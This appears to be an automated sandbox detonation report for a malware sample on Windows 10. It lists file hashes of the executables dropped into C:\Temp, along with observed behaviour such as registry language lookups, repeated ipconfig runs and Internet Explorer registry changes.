| SHA256 | 9b781d10953b5c97b2c3ad63c002b18a14b50bc333ff6286137112dea0ff09a8 |
| SHA512 | cf2206f806147346c9f8dcd71ae8eceaef76e141fc55f7bade76a6b1de7e44121a2888c3e414888b7426909f0fd6def8edc0da08beb05824ad6fef2cc2065ad5 |
C:\Temp\pkecwupjey.exe
| MD5 | 354c3d4a101f203ab0ac6489009d1c61 |
| SHA1 | a622dca902245f4c982d89cc7bf4dd69a07c487e |
| SHA256 | c19b5dc62a31196f70ce175f63cfb4f8dbe4b60123aaebc7fb01890455f82c92 |
| SHA512 | 2519774adc9349b4cb437d5a558ccb7cadccddaa0f2565c7bda00c706d57da8e026ac4162150ab6ce943ac66f59f1133fb75888e6bd34c18bb5ea6779ff644a2 |
C:\Temp\i_pkecwupjey.exe
| MD5 | b41de74463a1839ece52343fb660a3f8 |
| SHA1 | 35c4d6f3c75eeaf249007a17cf84762bf701575d |
| SHA256 | be2041a400a46b9c7e97fefd3e25f7f217b8a82c332f788926c978785364c6f8 |
| SHA512 | b6fb662d6a6d1e8dd33c03288c4a271fc16c05d82896b7a9c975ef9a0da5b231383a22c51f557a404b777cef33a75b3723c4bd4abfb4bc4a62fd53dc0baf8917 |
C:\Temp\lgeysqlidx.exe
| MD5 | 5d0601686fd65961c8ab4983c2948a70 |
| SHA1 | 8f9fad54ba7e5de161f964903ebdca613eb49903 |
| SHA256 | a4f692681f877a7b666c8820dbaccad09ea128a2c2802717dd6ceb4f47482ac1 |
| SHA512 | b08a3e6b9e220a4f8dbba8fd4badce25c701c0182bbc4e08cfcfb597765f0c67613112bbbfba1d0d4323540ec9b9f5ce365a7acd3e3a795ce6651bdc24fdf495 |
C:\Users\Admin\AppData\Local\Temp\CabADCF.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarAEBE.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2f1d0b4e87901ee59542a6933c299013 |
| SHA1 | 23945fa3536accb6b501807b601bebb6bc633c82 |
| SHA256 | 35b4f0c0af2760e659d3dfdae19567fef12f267067b31b072702db5acb058529 |
| SHA512 | 34a55ab8bad1ca2ecdc14f6d08ddc35be075258e80dd1908ebf4ec8702eed4bcc6613736e410ea02485b74f9cf596830d649eaaf8594de2b265f3a46381cddec |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8e77711fc9db466571e1b167450904d0 |
| SHA1 | e114cf62b3ec08e9ce66f7bf700de8239fe5f2bb |
| SHA256 | 61d96bda5e5593c46f7a6efc1ff3e20e74465c6acd5b0c5cf8afa06e67b1f4ee |
| SHA512 | e07e1a217d4fda8efb74e2df534ddb788a315dc352cdd41c44c15820ff7c945d6c3cc970c290518df5234ee7e05bd9abdf4cc183d022684435d00212f20d4576 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4f1e9f2a11e42372813f0540e08c3fbe |
| SHA1 | 11378e7274506c18b722fe17c1e3029f41bd10a9 |
| SHA256 | 4a3aaba265a83ae8d1b54b63184e416b643b750b6262068a25dbdb5b5632e91d |
| SHA512 | c436413a97b08bb04889fa78e86a91a2fbbdbf85730d004e98cb09399ee36a93a74e5e5520a4dcc5b47b6c12a6d76de40be60817b2dd22f249dcfbf0efb82b57 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1f41702c3e281c6d2597011965d82641 |
| SHA1 | 9b118f9db6c066e7c704402071ab0104bd99836f |
| SHA256 | ba24a1ee6bb9b948ba2032764eb0ee8caaa4bf689991f8441c8380b7ff5b65b1 |
| SHA512 | 83a81af1a9b5a9aebc2c147368e562cbb17b07d1574de8feabfb0c6704de8f8028fe2551c871fc040480fcfbecf853ca5415d85a7cb37b9a3356db068801f8eb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ebf791d5824bff38fbd13365da347451 |
| SHA1 | 410f436edc3220ebb79585d80169450ca6b77a1e |
| SHA256 | 7cf3c980805c3d65ec1948ae5406429db4e4f2cb746e637df5cb4c6654d630c8 |
| SHA512 | b8212d32a28fe81a9fdc53c56a7417a6b4459c03426a56df76777de7aa34c44e95919791e20133a75cb08ba115144c4614dfe7614bdd448b49bf05be62832ea5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9c2b1ff8d75e086c0e3eb915538279d8 |
| SHA1 | af606e7482e66b0fca8170ee74c61f942b8692f7 |
| SHA256 | 1fb342fcfe5d420abcca1d21c4108b0099747c66452f725c4b301f9476b64aaa |
| SHA512 | b045eefbfcc779df920bacaae96fd645bca9dff0e234c82b084f614896fa3445a012a3d9232c5c1d2ad25c014fe311c22632a901b0b6e99265328d2ff3d75afa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 79b0c96bfba2931a799eca2889daada9 |
| SHA1 | b08e5a29fb7125c44c27d3353b35717a8231b311 |
| SHA256 | e01b11fc6aa706a78bd948b67b571f6642faec929702f0ccc51636d13df311e8 |
| SHA512 | e73583d2e46c8ada094af668e034a2e83ce5f217bb6976535c157d58c74939c0c2843d52d11f6bfaa91d14208e5b102269ff8fb99ab289b4c62b30026b2f33c4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6c26b351d33f57598544a6375c022d97 |
| SHA1 | 9b89de255cbbd38f8bdcc78cf4b366bcddd29f9c |
| SHA256 | 5c36fed000e4e41de3ed8f3585717d4dbc5d818563d7ca036ec6070708a4b1d6 |
| SHA512 | 9732eafb1a0d4a950cc5909f599b2945ee017d030b64e87afd2f122284ede3c0021ed35bb7c6b770749149b6d7b9dd53f15fec9da03753d8261303f15d66bb6c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 53c79a57c754e155827e7d3967fdda38 |
| SHA1 | 53c99169f18a3e9426f02044504e1ebd1731de0c |
| SHA256 | d8a044bcf9e6e3359334c503ea5717c15bb1ae4ea847c1ceec6be4aab8934757 |
| SHA512 | b60b63d059dc42388f7d8145514f30ada1af97121fad573e231f45907deedb0a8e9ca326748f577dfeb470bc410a32d93dbca5e5067e17e4dcc7a5e0f53513c8 |
C:\Temp\i_lgeysqlidx.exe
| MD5 | daf314b470f366f2ef5f4d4770609eb0 |
| SHA1 | ccaab4edba8bc6088845abaee762a76acd008e6d |
| SHA256 | 3a1f502192b9b254e0793c80ec2fee208877c744b4ef1d8cb2b7c06e9008fb12 |
| SHA512 | 89e4f5dfdb79ce141c1262b08abf48a5eee9d5b9cb912ff4fceac378eec92f5f611af5ec68e8f1d2e7c1447cf183d659428cce31b5ff9e8d1d8fa9b87913f1e5 |
C:\Temp\cxrpkhcwuo.exe
| MD5 | dc7180203ca0ff4cd9a01cb1c704c642 |
| SHA1 | b48a8c1659a999bd0986f66b6445fd91045a8642 |
| SHA256 | 520ea069f5d89554d72827625bd4ce1ddc2e84105f3a3bbb12ba1d300203e267 |
| SHA512 | a7872d64dc44679ab5226078113358ebe73d9a7c5fb58dde23ca327486a307861a722df96fc11650d9b853cdf27e59d07a484cc716f1a044862e64d5b79d2cd2 |
C:\Temp\i_cxrpkhcwuo.exe
| MD5 | 528d9dcdd66a852af7d3b249356f3bdf |
| SHA1 | 02a8a6f0716a800a5018184cc2a4402504494a21 |
| SHA256 | 50e5a2da3a456b67d5fecfb57e82936215e908e723f7022b83116a21ff121e5c |
| SHA512 | a4d33c1fa1e8ebcc25df89cf2cdda97d1cd1c65ed92d2f98aa92ea6a713fe13dc316833d59a1a79d6d143ec91c9d0c19e1989ded0f8e005539e0864d57a9c6dd |
C:\Temp\wupjhbztom.exe
| MD5 | f085c57ea68b19db508b378de5b368f3 |
| SHA1 | 67e179dfb1c8457f796f02c57be7ca77ddb4ff4a |
| SHA256 | 24df1286dbf40d749882d4380f32f91be7e8981ce21290f071dc906edfcea206 |
| SHA512 | d223910cfbeff61c76e804de3cf6d61a26a1ddc8306e554559f37047f1a7674c65926a30f535c82e713b9b90abcb556d5fb1b7b23be35dfcc61f9ea3cbeabcec |
C:\Temp\i_wupjhbztom.exe
| MD5 | de97875485ad024e1b28b60e83b94bee |
| SHA1 | fb7728ccfcb1e9c277772eba363af3bc68c17140 |
| SHA256 | 05c5c563b539355a202a54b864ff3d24aaa4c80b3a04ff735352c4e6188237dc |
| SHA512 | ecb5a035937e8450714ee9fce1d7a34de97468636240ef9de2ca06526f4a5ce5a2c1548be6d3a6a64e03b60f8a99a5c3aefc7d9a93141495ca0568d57a00de86 |
C:\Temp\wqojgbvtnl.exe
| MD5 | 13b9f61f667f5258f132dcdb0ec43dbd |
| SHA1 | ddf82b96ee36514c7aae26cd84fdf7d67e314085 |
| SHA256 | cf87d3e6edece72f60898b3294abc9f2a2ff6c126657a655719399caed30fa46 |
| SHA512 | 5ba2a4c837f27a5aee80fec59bddb15cd54016f6db277529c2f4734873d130848c08fd047b52691f95d281c161ed9a367b762ef3d5f172395409bb70f1e4b2a0 |
C:\Temp\i_wqojgbvtnl.exe
| MD5 | be937355df662b8d39d18bf91f5164cb |
| SHA1 | 799cb886f520533d8c1e8a16b36fc07c2b3f80b9 |
| SHA256 | 33864a6a2ac8d8aa412f62a14cf07b12c5f396e467ddddfdd244fdfdd6d455eb |
| SHA512 | 6dfad0fe9cb7e20c36559010946f8a0f6aab3c588a082f1e8fed4a5b4cd35bdf843a84018121b9d33e6501d6920bbda86bfc268e465f0f4fd734bb81f0182d24 |
C:\Temp\nlfaysqkfc.exe
| MD5 | 8b54aed8c9982a0447c17d25946f8cc2 |
| SHA1 | fc525b28ff2ae88c8afc54e104f5bdc084a5d733 |
| SHA256 | e2684e389d882f04bc7f5b93317f6608d6433ce96786c390f1a250ee41b5cc59 |
| SHA512 | 3d7a2c86b7e3945030c96b1364599ccc8a8d6a35b06f6b68a02d6f52964912ccf0ac1709e9445faf2cfe20c52db48fe0de96a5d326320815a63a6a2b1bf35228 |
C:\Temp\i_nlfaysqkfc.exe
| MD5 | 23e69d6c3bbe9fd2b69713bbdb52529c |
| SHA1 | 0befadd2bf300bcdf05b25f76176d8426834621f |
| SHA256 | 681a73dc4b919b1f27e6133b21293d4644cb484e692a86a57f76f93ee6608753 |
| SHA512 | bed4112d69f699ad911947105410a8d4e75a21080128e7f0e536b2823a445489932a7125d4a766de0935aff373adb8468ac2fdba1e40c31c1cc587d2a608bf6b |
C:\Temp\caupmhfzur.exe
| MD5 | 1f2701a7bfb8bc4ff54d9c9268d04c8a |
| SHA1 | 690ed76351ce1f40477b5c56676053e15e103479 |
| SHA256 | 6dd1bbf5c62d5c730e5ebbd3b722db8df13654ed6f3756ecc2902c697dab42de |
| SHA512 | f6eb01ad77b21d4e8ec42b912d56c443869b3eb2412643f1f667dc54334d1751bf3b2cb7055fa768edba2afb22c20fdffd5cea930f5d02b83b4bd91dfac46f59 |
C:\Temp\i_caupmhfzur.exe
| MD5 | 9dbf217c86132ff02816fd741df60665 |
| SHA1 | 8349cbb7236ea1257655a5ae095006efc654b1d9 |
| SHA256 | 658463c383184cbd844ec1d30a56762baca74770570c0888cc0682c08cdd9bb5 |
| SHA512 | cfb555ffb08bad28262e87760ac80197d7b46a6548a764b25a7826f4b4d6e48ae44c65f16fa2ac3a0b1ea815bb0d4421eea4f3f0ee9dc7389e0d5aa888cb1bba |
C:\Temp\rmgeywrljd.exe
| MD5 | d654145a1e98197d32417950e4511398 |
| SHA1 | 7ff39f2509ead996bce9849112b22a6c37942d0f |
| SHA256 | 76cb0f6aa2c6c75f143caff093f40a36f562a092e4ef7cf37569faf4490d852d |
| SHA512 | ef4e3839cc066392151fb63effa7eaf4f8dc6383c2101d1a8bd4de9d31886a740bb7ba5440b6d3594e243b8e2fcf87f66574f38aebc05a2269eedd383618839b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5e69d8333b7ced3c23d30b182489153a |
| SHA1 | e18e4ff8a92282baa41ce46fd5ea4095327bf529 |
| SHA256 | 0f7136ab0885db215e3d63b672fbe6669d2ed99eb0cbac8dfdbd8680183e77b0 |
| SHA512 | e5546cbde24d94c4de383d8078c6a58d9107897a721ad46a96a619d419a004bc26c24e8ea43d02db78678a75509abd9438ecc0661a9f0ce2d28be769dec4bee1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7501b09641eacc4f206dac1c50a9df6d |
| SHA1 | 877800b8707da3dd76a0581bfd852ed6eb1604f0 |
| SHA256 | 6b4bcb7905f71faca7e16b341d13e40f6216cc0bae2ab8e2b8046f7bd6122225 |
| SHA512 | 748e5d1fa2050a90e4029593778b40e4b630dfca846e54cf0e62d30608142ab86e176d57f3de123cdded01e42323acacd7a1ec70676f529b1264e966d08daf49 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ed9268aca781c8c4057bce611b9aa161 |
| SHA1 | dea97aaf2ce623b6c6a9958d2f453a1b5f9ce86f |
| SHA256 | 62919e92d04f8beb800fc5160a4bdccde4596bde9a64f56a00ab8c9ec8e7897e |
| SHA512 | 1c71a31df440dfb0939c946bdf46ffb798e7559f3bb41350bd7413a79846a7d28744828e68d0838773a4d0b8fd63593d5c0af10e5e65adb5ecd40fc6381bd531 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aac2e25a2466a52d6a21cedbb517976c |
| SHA1 | 48e8a8a77b4a0266f6c8bb837c73ecde1350b5c7 |
| SHA256 | 06074d1596109f93635c586849e36639375c49633efdde86edd26d9386d0d5c4 |
| SHA512 | e0e1158e40fddc5b38b575970bf10489b4556808acfe6112ee7e535f822e388b8297d165982036816407cb04b2513eb813a2954c1e64ae2e5e7bc08cc1b53e12 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 46688278e42093e8eec98919493acefb |
| SHA1 | fe2adeeaf28c16ba51f50f2f981101d4721d664c |
| SHA256 | 59829f252d1702e58b395d078810451f9e73a91cb8c84e1139e586aff2252b4d |
| SHA512 | baf62b87bce6ed45de361b292a81b8955b267e295f3bf3ce6481507ac7a95bdfcda51f2d0da66e37bfd90f45ffc3c930310ddf20c7a45909ea0534b3027fcff0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 60d120539084a73d6ef45fce6b83ff5b |
| SHA1 | b692abd5c2d2e05b2795dcfd6aad2584ece1b25a |
| SHA256 | 2a2a0db90f5d2622f4d4d669121e6b43bd5f812c693ce8eaf0aa101f06644826 |
| SHA512 | 83641ad37c493654b069d084643e19de108b71e9ac517dd3e09f8fa514b5539a4f9b363bcba1dbab4ae9db297cb28ede211afb819a919826b13e25bc8f7d6501 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2aa554e4c61e5bc9156b44778debdd03 |
| SHA1 | aabefb2b395bcf08dc3a32cfa5e0b4a47b4c7eda |
| SHA256 | b7f1fd9b9f1f4ef85fd8798a5352b40f131c4c8164827d3e77a8ddc44abd0425 |
| SHA512 | 07e2157d5624a04bc2c44e227fbec2e94901fd9da2f91784f0a40db60d4dd463e6250b810d4848afc9c67e5732367cd33fcad16c195b3af761ee283571a6dbc3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 90e6f76c2b0e9c0dd58e332d6eb4819d |
| SHA1 | 067573a3fb06aa07218d501800594a94b056a181 |
| SHA256 | 6fce3ba7a7b030d7d18dfaedea0d4166450ac0ad0579be302e54315dd21b262d |
| SHA512 | b4e886ac03498969827150e60e4b389f6f08b7791eeb770b1e01ead11a8804064159b9f7d95b1e709590b54d6a14c123818ec8978d71a34e61abede498b637cf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 45979d788cc3a7b8aae0782a93e8f904 |
| SHA1 | c99eb5584556a310fea41c11a6931cb15d28f265 |
| SHA256 | 4df0ef2740762fedeadaaaf3e2d23d3e06f3f7a04a5df45258e39083f8bfdc32 |
| SHA512 | ae43d110d09bfff2df2be69997a6ee78097f1214cfc293c66924212d8189b5506f510199d6bd2cdffd3c7302522d2578f96b32569e35f05f3b61c1923b4eb538 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6056e30a6a10ce91bcf0933fa53f69f4 |
| SHA1 | eaf0ff65fdee0ffdb9c30e3b60a9dcff8798f319 |
| SHA256 | 2af12381c2ba3e57cb4dcfe8127cde82691a84ba3fa2aedbe664d08fb750e93b |
| SHA512 | 3384a733015166b351498e29285c0ccc9f103beb80826de8829623904269ea39fa4d80947cfc2e4104a329a394a3585e4165b23c9dd80ec302b71ad49e2ed07f |
Analysis: behavioral2
Detonation Overview
Submitted
2025-01-27 20:34
Reported
2025-01-28 02:49
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Executes dropped EXE
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\zxrpjhczur.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\oigtqljdbv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_rljdbwtomg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\upnhfzxspk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\zusmkecwup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\trljebwuom.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\zxspkicamk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_uomgezwroj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\kicavpnhfa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_qnigaysqki.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_zxrpjhczur.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_oigtqljdbv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\uomgezwroj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\wqoigbytql.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\ojgbztrljd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\fdyvqnigay.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\axsqkicaus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_zxspkicamk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\dxvpnifaysqkicav.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\temp\CreateProcess.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_kicavpnhfa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_trljebwuom.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\xrpjhczusm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\rljdbwtomg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\qkicausnkf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_smkecwupmh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_kfzxrpkhcz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_xrpjhczusm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_wqoigbytql.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\smkecwupmh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_upnhfzxspk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_tnlfdyvqoi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\qnigaysqki.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_qkicausnkf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_axsqkicaus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\usmkfcxvpn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_usmkfcxvpn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\tnlfdyvqoi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\kfzxrpkhcz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_zusmkecwup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_ojgbztrljd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_fdyvqnigay.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31158574" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "444797372" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
